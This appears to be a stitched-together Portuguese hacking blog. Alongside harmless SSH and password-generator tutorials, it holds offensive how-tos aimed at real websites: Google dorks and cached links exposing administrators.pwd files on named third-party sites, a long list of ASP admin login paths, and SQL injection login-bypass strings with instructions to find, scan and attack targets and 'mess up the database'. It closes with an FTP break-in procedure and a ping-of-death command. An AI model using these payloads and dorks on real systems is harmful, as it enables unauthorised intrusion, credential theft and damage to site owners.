www.myshield.com/
www.idzap.com/
www.safegatetech.com/
www.breiter.ch/
www.rrdb.org/rrdbproxy.php?l=en
http://proxy.decodes.biz/
http://proxy.mxds.ch/
www.spondoo.com/
http://search.sicomm.us/
http://schnarre-monika.celebrityblog.net/cache.cgi
http://filter2005.com/
www.kproxy.com/
www.websitereactor.org/cgi-bin/001/nph-.pl
www.goproxing.com/
http://anonycat.com/
www.spynot.com/
www.merletn.org/anonymizer
www.cgi-proxy.net/
www.proxymouse.com/
www.theunblocker.tk/
www.betaproxy.com/
www.letsproxy.com/
www.freeproxysurf.info/
www.mysticproxy.com/
www.proxywave.com/
www.vtunnel.com/
www.proxysnail.com/
www.freeproxy.ca/
http://basic.3proxy.com/
www.privatebrowsing.com/
www.hackingtruths.org/proxy
http://xanproxy.be/
www.ipsecret.com/
www.proxyanon.com/
www.anonproxy.info/
www.proxysafe.com/
www.strongproxy.com/
www.boredatschool.net/
www.ukproxy.com/
www.simpleproxy.com/
www.phproxy.org/
http://surfonym.com/
http://geoepker.hu/freeproxy/
www.browseatwork.com/
www.ipblocker.info/
www.boredatwork.info/
www.anonymousurfing.info/
www.browsingwork.com/
www.freeproxyserver.org/
www.browseany.com/
www.browsesecurely.com/
http://IEproxy.com/
www.sneak3.po.gs/
www.proxytastic.com/
www.freewebproxy.org/
www.thecgiproxy.com/
www.hide-me.be/
www.anotherproxy.com/
www.proxy77.com/
www.surf-anon.com/
www.free-proxy.info/
www.theproxysite.info/
www.proxyify.info/
www.concealme.com/
http://browseschool.info/
http://browsework.info/
http://browsingschool.info/
http://browsingwork.info/
http://browsingschool.com/
www.proxyindex.com/
www.gobyproxy.com/
www.proxifyme.com/
www.proxyghost.com/
www.spysurfing.com/
www.unblockthis.com/
www.proxyserver7.com/
www.daveproxy.co.uk/
www.tntproxy.com/
www.neoproxy.net/
www.bypassbrowser.com/
www.procksie.com/
www.httproxy.com/
www.cgiproxy.info/
www.silentsurf.com/cgi-bin/nph-index.cgi
www.proxy-sock.com/
www.proxygeek.com/
www.datadefense.org/
www.hideyour.info/
www.howto.pro/
www.collegeproxy.com/
www.demonproxy.com/
www.satanproxy.com/
www.hidingyou.com/
www.intelliproxy.com/
www.fireprox.com/
www.h0h0h0.com/firewall/
www.katedrala.cz/
www.browseatwork.net/
www.2255.info/
www.vproxy.be/
www.boxproxy.com/
www.nopimps.com/
www.fsurf.com/
www.proxylord.com/
http://roachhost.com/hp/
www.freepr0xy.com/
www.proxypop.com/
http://proxy.winidn.com/
www.cloax.net/
www.proxy247.com/
www.traceless.com/
www.siatec.net/proxyanonymizer
www.stealth-ip.net/
www.proxywhip.com/
www.proxy-surf.net/
www.videoeditors.info/proxy/
www.blockmy.info/
www.proxychatroom.com/
www.teenproxy.com/
www.totalupload.com/surf/
www.proxene.com/
www.fileshack.us/proxy.php
www.cloaker.ca/
www.proxified.net/
www.mrreid.net/

Lista de Portas de Trojan Horses II

Alguns aqui repetem o tópico da parte 1 da lista:
----------------------------------------------------

Porta 21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash

Porta 23 - Tiny Telnet Server

Porta 25 - Antigen, Email Password Sender, Haebu Coceda, Terminator, Shtrilitz
Stealth, WinPC, WinSpy

Porta 31 - Hackers Paradise, Master's Paradise 8

Porta 121 - BO jammerkillahV

Porta 456 - Hackers Paradise

Porta 555 - Ini-Killer, Phase Zero, Stealth Spy

Porta 666 - Satanz Backdoor, Attack FTP

Porta 1001 - Silencer, WebEx

Porta 1011 - Doly Trojan

Porta 1033 - NetSpy

Porta 1080 - Wingate (Socks-Proxy)

Porta 1170 - Psyber Stream Server, Voice, Streaming Audio Trojan

Porta 1234 - Ultors Trojan

Porta 1243 - SubSeven

Porta 1245 - VooDoo Doll

Porta 1492 - FTP99CMP

Porta 1509 - Psyber Streaming Server

Porta 1600 - Shivka-Burka

Porta 1807 - SpySender

Porta 1981 - Shockrave

Porta 1999 - BackDoor

Porta 2001 - Trojan Cow

Porta 2023 - Ripper

Porta 2115 - Bugs

Porta 2140 - Deep Throat, The Invasor

Porta 2565 - Striker

Porta 2583 - WinCrash 2.0

Porta 2801 - Phineas Phucker

Porta 3024 - WinCrash


Porta 3129 - Masters Paradise

Porta 3150 - Deep Throat, The Invasor

Porta 3700 - Portal of Doom

Porta 4590 - ICQTrojan

Porta 4950 - IcqTrojen

Porta 5000 - Sockets de Troie

Porta 5001 - Sockets de Troie

Porta 5321 - Firehotcker

Porta 5400 - Blade Runner

Porta 5401 - Blade Runner

Porta 5402 - Blade Runner

Porta 5569 - Robo-Hack

Porta 5742 - WinCrash

Porta 6400 - The tHing

Porta 6670 - DeepThroat

Porta 6771 - DeepThroat

Porta 6883 - DeltaSource

Porta 6939 - Indoctrination

Porta 6969 - GateCrasher, Priority

Porta 7000 - Remote Grab

Porta 7300 - NetMonitor

Porta 7301 - NetMonitor

Porta 7306 - NetMonitor

Porta 7307 - NetMonitor

Porta 7308 - NetMonitor

Porta 7789 - ICKiller

Porta 9872 - Portal of Doom

Porta 9873 - Portal of Doom

Porta 9874 - Portal of Doom

Porta 9875 - Portal of Doom

Lista de Portas de Trojan Horses

Lista de Portas de Trojans

Se você não sabe o nome do Trojan que está infectada, reunimos uma lista com as portas usadas por esses trojans:
Porta 21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash
Porta 23 - Tiny Telnet Server
Porta 25 - Antigen, Email Password Sender, Haebu Coceda, Terminator, Shtrilitz Stealth, WinPC, WinSpy
Porta 31 - Hackers Paradise, Master's Paradise 8
Porta 121 - BO jammerkillahV
Porta 456 - Hackers Paradise
Porta 555 - Ini-Killer, Phase Zero, Stealth Spy
Porta 666 - Satanz Backdoor, Attack FTP
Porta 1001 - Silencer, WebEx
Porta 1011 - Doly Trojan
Porta 1033 - NetSpy
Porta 1080 - Wingate (Socks-Proxy)
Porta 1170 - Psyber Stream Server, Voice,Streaming Audio Trojan
Porta 1234 - Ultors Trojan
Porta 1243 - SubSeven
Porta 1245 - VooDoo Doll
Porta 1492 - FTP99CMP
Porta 1509 - Psyber Streaming Server
Porta 1600 - Shivka-Burka
Porta 1807 - SpySender
Porta 1981 - Shockrave
Porta 1999 - BackDoor
Porta 2001 - Trojan CowPortaPorta
Porta 2003 - Ninja Spy
Porta 2023 - Ripper
Porta 2115 - Bugs
Porta 2140 - Deep Throat, The Invasor
Porta 2565 - Striker
Porta 2583 - WinCrash 2.0
Porta 2801 - Phineas Phucker
Porta 3024 - WinCrash
Porta 3129 - Masters Paradise
Porta 3150 - Deep Throat, The Invasor
Porta 3700 - Portal of Doom
Porta 4590 - ICQTrojan
Porta 4950 - IcqTrojen
Porta 5000 - Sockets de Troie
Porta 5001 - Sockets de Troie
Porta 5321 - Firehotcker
Porta 5400 - Blade Runner
Porta 5401 - Blade Runner
Porta 5402 - Blade Runner
Porta 5569 - Robo-Hack
Porta 5742 - WinCrash
Porta 6400 - The tHing
Porta 6670 - DeepThroat
Porta 6771 - DeepThroat
Porta 6883 - DeltaSource
Porta 6939 - Indoctrination
Porta 6969 - GateCrasher, Priority Porta 7000 - Remote Grab
Porta 7300 - NetMonitor
Porta 7301 - NetMonitor
Porta 7306 - NetMonitor
Porta 7307 - NetMonitor
Porta 7308 - NetMonitor
Porta 7789 - ICKiller
Porta 9872 - Portal of Doom
Porta 9873 - Portal of Doom
Porta 9874 - Portal of Doom
Porta 9875 - Portal of Doom
Porta 9989 - iNi-Killer
Porta 10067 - Portal of Doom
Porta 10167 - Portal of Doom
Porta 11000 - Senna Spy
Porta 11223 - Progenic trojan
Porta 12223 - Hack´99 KeyLogger
Porta 12345 - GabanBus, NetBus
Porta 12346 - GabanBus, NetBus
Porta 12361 - Whack-a-mole
Porta 12362 - Whack-a-mole
Porta 16969 - Priority
Porta 20001 - Millennium
Porta 20034 - NetBus 2 Pro, NetRex Pro
Porta 21544 - GirlFriend
Porta 22222 - Prosiak 0.47
Porta 23456 - Evil FTP, Ugly FTP, WhackJob
Porta 26274 - Delta
Porta 30029 - AOLTrojan1.1
Porta 30100 - NetSphere
Porta 30303 - Sockets de Troie 2.5
Porta 30999 - Kuang
Porta 31337 - Back Orifice
Porta 31338 - Back Orifice, DeepBO
Porta 31339 - NetSpy DK
Porta 31666 - BOWhack
Porta 31787 - Hack'a'tack
Porta 33333 - Prosiak
Porta 34324 - BigGluck, TN, Tiny Telnet Server
Porta 40412 - The Spy
Porta 40421 - Master's Paradise
Porta 40422 - Master's Paradise
Porta 40423 - Master's Paradise
Porta 40426 - Master's Paradise
Porta 47262 - Delta
Porta 50505 - Sockets de Troie
Porta 50766 - Fore
Porta 53001 - Remote Windows Shutdown
Porta 61466 - Telecommando
Porta 65000 - Devil

Código do vírus que detonou no Orkut

Em um efeito dominó jamais visto ele criou uma das maiores comunidades já vistas no Orkut.

O vírus na verdade num causa mal algum, é só um aplicativo em flash que se espalha pela sua lista de amigos e entra numa comunidade criada pelo editor do código.

Resumindo, funciona assim:

- Você lê o scrap com o código;
- Ele injeta um código javascript no seu navegador;
- O código faz você entrar na comunidade;
- Coleta a sua lista de amigos;
- Envia o recado com o código para eles.

Para quem quiser tentar imitar o fanfarrão que fez o código, vai o aviso: o bug já foi corrigido, e este tipo de atitude no EUA seria punida com prisão como pode ser vista neste post, já no Brasil…

Segue aqui o código do vírus do Orkut:

Autenticação com chaves Pública/Privada no SSH

Autenticação com chaves Publica/Privada no SSH

Para que não seja mais necessário colocar senha toda vez que você conecta a um servidor ou para viabilizar backups automaticos que utilizam conexão SSH. Você pode utilizar a autenticação por PublicKey com chaves privadas e publicas!

Geramos no host as chaves publica e privada:


$ ssh-keygen -t rsa

isso irá gerar as chaves id_rsa (privada) e id_rsa.pub (publica) ambas em ~/.ssh

Agora vamos copiar a chave publica para o servidor com um comando só:


$ ssh-copy-id -i ~/.ssh/id_rsa.pub login@servidor

Pronto! Agora vamos aplicar algumas permissões no servidor:


$ chmod 600 ~/.ssh/authorized_keys

$ chmod 700 /home/usuario/.ssh

$ chmod 700 /home/usuario

Agora, configure o arquivo /etc/ssh/sshd_conf para usar as chaves de autenticação. Certifique-se de que as linhas a seguir estão descomentadas:


RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile %h/.ssh/authorized_keys

Reinicie o servidor caso faça essas auterações.

Para verificar o que acontece durante a conexao:


ssh -v login@servidor (para ver as mensagens)

ssh -vvv login@servidor (para ver TODAS as mensagens)


Retirado de: http://ramonrdm.wordpress.com
Fontes:

http://blogdonerd.com.br/2010/09/estabelecendo-relacao-de-confianca-ssh-entre-servidores-linux/

http://www.hardware.com.br/tutoriais/dominando-ssh/pagina5.html

http://www.dicas-l.com.br/arquivo/logando_com_seguranca_num_servidor_ssh_sem_uso_de_senha.php

http://segurancalinux.com/artigo/Dicas-avancadas-de-seguranca-para-SSH

http://focalinux.cipsga.org.br/guia/avancado/ch-s-ssh.htm

http://www.zago.eti.br/ssh/ssh-sem-senha.txt

http://www.debian.org/doc/manuals/debian-reference/ch-tune.pt-br.html

https://www.cs.indiana.edu/Facilities/FAQ/Security/openssh.html

http://atitudereflexiva.wordpress.com/2011/02/13/ssh-com-chave-publica/

http://www.debian.org/doc/manuals/debian-reference/ch-tune.pt-br.html

fontes de configuração:

http://www.hugoazevedo.eti.br/html/sshd.html

http://www.hugoazevedo.eti.br/html/ssh.html

Monitirar Tráfego de rede pelo Terminal

Para ver em tempo real, ifTop e ipTraf:

# apt-get install iftop

# apt-get install iptraf

e ainda o ntop que serve mais para monitoramento:

# apt-get install ntop

coloque a senha de admin, depois disso pare o processo com Ctrl+C:

# ntop

Inicialize o processo:

# /etc/init.d/ntop start

depois

http://endereco_servidor:3000


retirado de: http://ramonrdm.wordpress.com/
Fontes:

http://pt.kioskea.net/faq/8352-linux-trafico-que-entra-sai-em-tempo-real

http://www.vivaolinux.com.br/dica/Usando-o-ntop-para-monitorar-a-rede

http://www.hardware.com.br/livros/servidores-linux/monitorando-com-ntop.html

http://www.vivaolinux.com.br/artigo/NTop-Configuracoes-gerais?pagina=1

Criando Senhas aleatórias e seguras no Linux

A utilização de senhas seguras é uma obrigação a todo profissional de TI. Suas senhas devem ter um bom comprimento e alternar entre letras, números e caracteres especiais, diminuindo drasticamente a possibilidade de descoberta das senhas por outras pessoas ou mecanismos automáticos. Para facilitar a nossa vida existem dois utilitários no linux que geram senhas aleatórias sem que precisemos queimar neurônios para criá-las sozinhos: mkpasswd e makepasswd

O comando mkpasswd já vem no linux e utiliza a função crypt para gerar senhas. Já o makepasswd é mais completo: utiliza o /dev/random para gerar as senhas, pode gerar várias senhas de uma só vez e criptografá-las com o algoritmo md5.

Gerando senhas com o mkpasswd:

Apenas digite no terminal o comando:


Código:


$ mkpasswd


saída:


Código:


senha: digite-a-senha-aqui
/o76/Dpgmv/5rX2


Instalando o makepasswd(eu recomendo esse)


Em distribuições Debian-like, digite o seguinte comando no terminal:


Código:



$ sudo apt-get install makepasswd



Gerando senhas com o makepasswd:

Digite no terminal:


Código:


$ makepasswd


Saída:


Código:


1mnU8L1LVF

Para alterar o comprimento da senha gerada, utilize a opção –char


Código:


$ makepasswd –char 12


saída:


Código:


9HaifQW4q923


para gerar várias senhas de uma só vez utilize –count



Código:



$ makepasswd –count 5

Saída:



Código:



LzSoH0
K2QXW5L
AisGn0vn
ETVj0W74
NpBp1TeA



Para gerar uma senha criptografada, utilize –crypt-md5 (Ele exibirá a senha em texto plano e criptografada)


Código:


$ makepasswd –crypt-md5

Saída:


Código:


YM2WYIry $1$mn8MFbyM$Suk986UgD/kOuNBJsBzoD/

Um pequeno script para alterar senhas de usuários com o makepasswd:


Código:



#!/bin/bash
#changepass
#Script para alterar a senha de um usuario
#escrito por Luiz Guanabara www.guanabara.eti.br
#if [ $UID != 0 ]
then
echo -e “\n\tVoce precisa ser root para executar este script!\n”
exit
fi

echo “Informe o nome do usuario”
read name
echo “Informe o comprimento da senha”
read lenght

pass=$(makepasswd –char $lenght)

echo “$name:$pass” | chpasswd

echo “A senha do usuario $name foi alterada para $pass “



———————

Pwgen: utilitário para criar senhas seguras no Linux

por Helbert Rocha no dia 13/ago/2010 em Aplicativos

Pwgen é um gerador de senhas projetado de modo que as senhas sejam facilmente memorizadas pelas pessoas. As senhas que podem ser lembradas pelas pessoas nunca foram tão seguras quanto aquelas geradas aleatoriamente. Em particular, as senhas geradas por este aplicativo sem a opção “-s” não devem ser usadas onde elas podem ser atacadas pela força bruta.

Instalação

Ubuntu

No Ubuntu, para instalar o Pwgen, basta executar o comando abaixo no terminal.

$ sudo apt-get install pwgen

Fedora

No Fedora, para instalar o Pwgen, basta executar o comando abaixo no terminal.

$ su -c 'yum install pwgen'

Uso

Para utilizar o Pwgen, temos algumas opções. Vide abaixo quais são elas.
o -0, para não incluir números nas senhas geradas.
o -A, para não incluir letras maiúsculas.
o -B, para excluir caracteres que possam causar confusões, como 1 e l, por exemplo.
o -y, para inserir ao menos um caractere especial (*$=!?% …).
o -n, para inserir ao menos um número na senha gerada.
o -s, para gerar uma senha aleatória e difícil de ser memorizada.

Exemplo

$ pwgen -0AByns 5 3
OYQS9 5z4O1 gRjR9

Portanto, vemos que foram geradas 3 senhas de 5 caracteres de acordo com as opções pedidas. Para mais informações sobre o Pwgen, clique aqui.

Fontes: retirado de http://ramonrdm.wordpress.com/

http://networkteam.forumbrasil.net/t30-linux-gerando-senhas-seguras-e-aleatorias

http://meupinguim.com/pwgen-utilitario-criar-senhas-seguras-linux/

Strings Malignas do Google

ENTRE NO SITE DO GOOGLE: www.google.com e após coloque na barra de endereços(URL)

index of ftp +.mdb allinurl:/cgi-bin/ +mailto

administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index

allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov

vcs poderaumate mesmopastas de acesso root

http://64.233.167.104/search?q=cache:7E-Hf7gzvMYJ:felix.unife.it/Root/+%22index+of/root%22&hl=pt-BR&ct=clnk&cd=1&gl=br

nuss o google continua do jeito que gosto admin


http://64.233.167.104/search?q=cache:n538lfFtfRcJ:www.conass.org.br/admin/arquivos/+%22index+of/admin%22&hl=pt-BR&ct=clnk&cd=1&gl=br


http://64.233.167.104/search?q=cache:504ifu-a1f0J:www.sismod.com.br/Admin/+%22index+of/admin%22&hl=pt-BR&ct=clnk&cd=3&gl=br

http://www.blogg.org/admin/kietu/media/
http://www.cimar.ucr.ac.cr/administrador-pronostico/autentificacion/imagenes/

http://www.intelicelsa.com/administrador/

http://perrodeaguas.net/administrador/funciones/

bem voltando senhas admin

http://72.14.205.104/search?q=cache:3XliNQ9qquwJ:trade.hamk.fi/wwwkurssi/_vti_pvt/administrators.pwd+inurl:administrators.pwd&hl=pt-BR&ct=clnk&cd=7&gl=br


http://72.14.205.104/search?q=cache:wWNFjzDDF9MJ:www.bucks.edu/~fishg/_vti_pvt/administrators.pwd+inurl:administrators.pwd&hl=pt-BR&ct=clnk&cd=8&gl=br

http://72.14.205.104/search?q=cache:IxP9AbvsyOEJ:www.21stcapital.com/_vti_pvt/administrators.pwd+inurl:administrators.pwd&hl=pt-BR&ct=clnk&cd=15&gl=br


a busca dentro do google pra tais senhas
é esta :

inurl:administrators.pwd

pra quem conhece um pouco de home pages
alguns diretorios bem interessante

http://72.14.205.104/search?q=cache:9o1ckLLIE74J:support.apollo3.com/password/+%E2%80%9CIndex+of+/%E2%80%9D+%2Bpassword.txt&hl=pt-BR&ct=clnk&cd=2&gl=br


http://72.14.205.104/search?q=cache:7Y1Bydblz84J:homepages.cae.wisc.edu/~ece468/+%E2%80%9CIndex+of+/%E2%80%9D+%2Bpassword.txt&hl=pt-BR&ct=clnk&cd=3&gl=br

Strings ASP básicas para invasão de sites

segue a lista:

/admin/default.asp
/admin/index.asp
/admin/login.asp
/admin/password.asp
/admin/senha.asp
/login/login.asp
/adm/login.asp
/adm/index.asp
/adm/default.asp
/login/index.asp
/login/default.asp
/webmaster/login.asp
/webadmin/default.asp
/webadmin/index.asp
/webadmin/default.asp
/acesso/admin.asp
/acesso/admin/default.asp
/acesso/admin/index.asp
/adm/admin/default.asp
/adm/admin/index.asp
/adm/admin/login.asp
/adm/default.asp
/adm/index.asp
/adm/login.asp
/admin/acesso.asp
/admin/adm/senha.asp
/admin/admin.asp
/admin/admin/adm.asp
/admin/admin/default.asp
/admin/autenticar.asp
/admin/default.asp
/admin/entrar.asp
/admin/index.asp
/admin/logar.asp
/admin/login.asp
/admin/logout.asp
/admin/loja/senha.asp
/admin/lojas/default.asp
/admin/lojas/index.asp
/admin/menu.asp
/admin/painel.asp
/admin/password.asp
/admin/senha.asp
/admin/site/entrar.asp
/administrador/login.asp
/area_restrita/admin.asp
/area_restrita/index.asp
/area_restrita/login.asp
/asp/admin/default.asp
/asp/admin/index.asp
/asp/admin/login.asp
/banner/admin/
/banner/admin/default.asp
/banner/admin/index.asp
/banners/admin.asp
/banners/admin/default.asp
/banners/admin/index.asp
/banners/admin/login.asp
/busines/admin/
/cadastro/admin/
/client/admin.asp
/clientes/admin/
/comercio/admin.asp
/comercio/admin/default.asp
/comercio/admin/index.asp
/compras/admin/
/controle/admin.asp
/controle/admin/default.asp
/controle/admin/index.asp
/controle/admin/login.asp
/db/admin/default.asp
/db/admin/index.asp
/db/admin/login.asp
/db/admin/senha.asp
/ecommerce/admin/default.asp
/ecommerce/admin/index.asp
/ecommerce/admin/login.asp
/edit/admin/default.asp
/edit/admin/index.asp
/editar/admin.asp
/editar/admin/default.asp
/editar/admin/index.asp
/editar/admin/login.asp
/eshop/admin.asp
/eshop/admin/
/eshop/admin/default.asp
/eshop/admin/index.asp
/form/admin.asp
/home/adm/defaul.asp
/home/adm/index.asp
/home/admin/login.asp
/home/admin/senha.asp
/host/admin/default.asp
/host/admin/index.asp
/host/admin/login.asp
/images/admin/
/imprensa/admin.asp
/imprensa/admin/default.asp
/imprensa/admin/index.asp
/imprensa/admin/login.asp
/imprensa/login.asp
/login/admin.asp
/login/default.asp
/login/index.asp
/login/login.asp
/login_admin/default.asp
/login_admin/index.asp
/login_admin/login.asp
/loja/admin.asp
/menu/admin/admin.asp
/menu/admin/default.asp
/menu/admin/index.asp
/menu/admin/login.asp
/menu/admin/senha.asp
/menu_admin/default.asp
/menu_admin/index.asp
/menu_admin/login.asp
/menu_admin/senha.asp
/news/admin/
/news/admin/default.asp
/news/admin/index.asp
/news/admin/login.asp
/news/admin/senha.asp
/newsleter/admin.asp
/newsleter/admin/default.asp
/newsleter/admin/index.asp
/noticias/admin/
/noticias/admin/senha.asp
/order/admin/default.asp
/order/admin/index.asp
/order/admin/login.asp
/order/admmin.asp
/painel/admin/admin.asp
/painel/admin/default.asp
/painel/admin/index.asp
/painel/admin/login.asp
/painel/admin/senha.asp
/parceiros/admin.asp
/parceiros/admin/default.asp
/parceiros/admin/index.asp
/parceiros/admin/login.asp
/pedidos/admin/default.asp
/pedidos/admin/index.asp
/pedidos/admin/login.asp
/pedidos/admin/senha.asp
/portal/admin/
/portal/admin/senha.asp
/post/admin/
/post/admin/default.asp
/post/admin/index.asp
/post/admin/login.asp
/principal/admin.asp
/principal/admin/default.asp
/principal/admin/index.asp
/principal/admin/login.asp
/principal/admin/senha.asp
/restrito/acesso/admin.asp
/restrito/adm/login.asp
/restrito/admin.asp
/shop/admin/default.asp
/shop/admin/index.asp
/shop/admin/logar.asp
/shop/admin/login.asp
/shopping/admin.asp
/shopping/admin/default.asp
/shopping/admin/index.asp
/shopping/admin/login.asp
/site/admin/
/site/admin/default.asp
/site/admin/index.asp
/site/admin/login.asp
/site/admin/senha.asp
/store/admin.asp
/store/admin/default.asp
/store/admin/index.asp
/store/admin/logar.asp
/stroe/admin/login.asp
/strore/admin/senha.asp
/vendas/admin/senha.asp
/web/admin/default.asp
/web/admin/index.asp
/web/admin/login.asp
/webadmin/default.asp
/webadmin/index.asp
/webmaster/autenticar.asp
/webmaster/entrar.asp
/webmaster/logar.asp
/webmaster/login.asp
/webmaster/senha.asp

' or ' 1
'1' = '1'
' or '1'='1
'' or '1'='1'
"senha"
"password"
"teste"
"123"
"1234"
"12345"
"VB"
"visual"
"basic"
' or senha='teste
' or senha='login 'or email like 'dm%
' or email like 'dm%
'or '1'='1' order by 1 --
' or '1'='1' order by 1 --
' or 1=1--
'or''='
' or 'a'='a
') or ('a'='a
b' or ' 1='
' or '|
123'or'=
admin'-
' or '1=true
7' or ' 1

Strings para usar no Google

Muitas pessoas, estao acostumadas de só fazer pesquisas no google de forma direta!
ou seja se ele vai procura algo como uma musica. Simplesmente ele digita o nome da musica e pronto.
E ainda se limita, pois quase todos os links achados chamam paginas, para compra o produto desejado, como exemplo MercadoLivre,Buscapé entre outros.

Com algumas Strings que estarei mostrando agora é possivel sim localizar estes arquivos que outrora era "impossivel".

Procure por Músicas em formato Mp3:

intitle:index.of"mp3"+"NOME DA BANDA OU MUSICA"-html-htm-php-asp"last Modified"

Procurar por Filmes e Videos:

Para entendermos e para vincarmos bem esta mecanica 'vamos pedir emprestados' alguns operadores
que usamos nas pesquisas MP, assim vamos usar estes 'comandos'.
-inurl:htm -inurl:html intitle: "index of"

Podemos também usar "-inurl:php" para evitar os aborrecidos arquivos index.php que dao resultados na pesquisa, páginas que nao interessam.

Agora adicionamos as nossas conhecidas extensoes dos filmes como o mpg,avi,wmv à nossa chave de procura e podemos testar.

Vai certamente encontrar muitos diretorios recheadas de filmes, mas podemos refinar ainda mais a nossa pesquisa adicionando um chave específica à linha de comandos.

-inurl:htm -inurl:html -inurl:php intitle:"index of" (mpg|avil|wmv)"SEU FILME OU VIDEO PROCURADO"

O Operador (mpg/avi/wmv) Também pode ser escrito (mpg or avi or wmv).

Musicas/Videos

Digite

?intitle:index.of? mp3 (nome do Artista)
?intitle:index.of? avi (nome do Artista)
Ex:
?intitle:index.of? mp3 simpleplan
?intitle:index.of? avi hackers

--------------------------------------------------------------------------------
LINKS PARA SUA PÁGINA

Por exemplo, se vc tem um HP e você quer ver quantos links existentes para akela página usamos a seguinte String:

link:http://www.google.com.br/

Acima substitua o site do google pelo seu site.

Mistérios da Microsoft - Completo

Hoje irei mostrar algo interessante sobre o Bill Gates, quer dizer, William Henry Gates III, que seria seu nome verdadeiro, isto é um pouco duvidoso. Porém o que irei mostrar revela que realmente o “apelido” (se é assim que possamos dizer) tem um significado um tanto curioso:
Bill Gates III em forma de código equivalente em ASCII (American standard code for information interchange). Para cada uma letra possuí um número, a soma de todas elas obtém o número 666, que é o número da BESTA (que tanto cita nas escrituras da bíblia):
B = 66
I = 73
L = 76
L = 76
G = 71
A = 65
T = 84
E = 69
S = 83
I = 1
I = 1
I = 1
= 666 O NÚMERO DA BESTA.
Será realmente verdade? Por que faria tanto sentido? Por que um significado tão real?
Não cabe a nós julgar, por isso ficará para reflexão e análise pessoal de cada um o artigo.

Você sabia?

Ramon - o Hacker de microondas



esta outra é a evolution, parte II:



Oração Hacker

achei em um site por aí que estava offline uma oração hacker demais:

Byte nosso de cada dia que nos trái hoje
Falsificado seja o vosso registro
Venha a nós o vosso password
Seja pirateada a vossa integridade
Assim na Web como no UNIX
O script nosso de cada dia que nos auxiliai hoje
Crackeai os nossos programas
Assim como nós hackeamos aqueles que os tem obtido
Não nos deixeis cair na prisão
Mas nos livrai dos log files,
Disconnected

22 de out de 2011

Barra lateral do blog - Problema Resolvido

Nesse Blog tivemos problemas com a barra lateral direita aí como podem ver, mas o problemas já foi resolvido, o problema era:

TAGS MAL FECHADAS: < span > < /span >, < a> , e tambem as imagens que podem dar problemas com o tamanho muito grande; se caso isso acontecer no blog de algeum ai as instruções foram dadas. Fechem bem as tags e ajustem o tamanho das imagens se~o problema persistir, exclua e refaça a postagem e arrume as tags e imegens dela aí não tem erro.

SQL Injection básico

É o seguinte, Este truque é aplicado ao navegador, no modo de string, que acessa o servidor, varrendo os cookies, e assim podendo liberar a entrada do administrador.

Google é seu amigo, e te ajudará nesta tarefa, pois ele te ajudará a pesquisar por páginas específicas.
Iremos então usar o comando "allinurl".
esse comando procura especificadamente aquilo que se vem depois dos dois pontos
exemplo: allinurl:/site/admin/
com esse codigo ele caçará paginas com campos de logins de adiministraçoes.
abaixo uma lista com algums codigos para vc pesquisar no google.


allinurl:/webadmin/default.asp
allinurl:/menu_admin/default.asp
allinurl:/menu_admin/index.asp
allinurl:/menu_admin/login.asp
allinurl:/noticias/admin/
allinurl:/news/admin/
allinurl:/cadastro/admin/
allinurl:/portal/admin/
allinurl:/site/admin/
allinurl:/home/admin.asp
allinurl:/home/admin/index.asp
allinurl:/home/admin/default.asp
allinurl:/home/admin/login.asp
allinurl:/web/admin/index.asp


Pegue uma das strings acima e pesquise a vontade:


Após isso saira uma lista de sites com paginas com campos de logins e senhas
ate ai tudo bem agora vamos escaniialos usando um scanner como o Acutinex
depois de scaneado e acuzando a suposta vulnerabilidade de sql injection

É só testarmos strings nos campos de login sda página afetada.


A mesma string usada no login deve ser usada no campo de senha ok.
abaixo uma lista de strings:

* b’ or ‘ 1=’
* ‘ or ‘1
* ‘ or ‘|
* ‘ or ‘a’='a
* ‘ or ”=’
* ‘ or 1=1–
* ‘) or (’a'=’a
* ‘ or ‘1′=’1
* admin ‘ – -
* ‘ ou 0=0 –
* “ou 0=0 –
* ou 0=0 –
* ‘ ou 0=0 #
* “ou 0=0 #
* ou 0=0 #
* ‘ ou ‘ x’='x
* “ou” x”=”x
* ‘) ou (’ x’='x
* ‘ ou 1=1 –
* “ou 1=1 –
* ou 1=1 –
* ‘ ou a=a –
* “ou” a”=”a
* ‘) ou (’ a’='a
* “) ou (”a”=”a
* hi “ou” a”=”a
* hi “ou 1=1 –
* hi ‘ ou 1=1 –
* hi ‘ ou ‘ a’='a
* hi ‘) ou (’ a’='a
* hi”) ou (”a”=”a
* ‘ or ‘x’='x


Teste até conseguir, faça uma confusão no Banco de dados.

20 de out de 2011

Método antigo: Invasão por FTP

Bom, este método não funciona mais, mas para fins de estudo e entendimento, seguem os métodos abaixo.


  1. Abrir o prompt de comando do windows
  2. Digitar: "ftp" e então vai surgir a caixa : ftp>
  3. Digitar: "open" então vai aparecer: to, ou Para
  4. Digitar: ftp.site.com (irá colocar ftp ao invés de www)
  5. Se o endereço do site estiver correto então irá pedir login do usuário
  6. Digitar "enter" e então irá pedir senha e você apertaria "enter" novamente.
  7. Vai aparecer falha no login e senha e então você digita: quote user ftp , e então aperte "enter 
  8. Escreva: quote cwd ~root , ou, quote cwd ~sys , e depois aperte "enter" e então escreva quote pass ftp


E então se você tivesse crackeado, apareceria uma mensagem, provavelmente falando que era ilegal ou coisa do tipo. Mas se aparecesse a mensagem login anonymous, você não conseguiu crackear, apenas tinha conseguido um login anônimo e isso não te daria acesso a todas os diretórios. Porem se conseguisse era bem provável que estaria na pasta \home\root. Se você precisasse de uma ajudinha extra era só entrar no seu navegador e digitar: ftp.sitevitima.com e então iria ver os diretórios com clareza.

Método antigo de NUKE

primeiro essa é uma técnica que não existe mais para o prompt de comando do windows, seu nome é NUKE ou simplesmente PING DA MORTE, e sabe quem solucionou este problema? Foi graças a equipe do LINUX-UBUNTO. Esse método consistia em mandar grande quantidade de bytes para um IP ou site até a conexão dele cair, mas como eu já disse isso é um problema já solucionado. Aí segue como se fazia:


primeiro: abrir o prompt de comando do windows;
segundo: escrever assim: ping -l- 65000 -t site.com


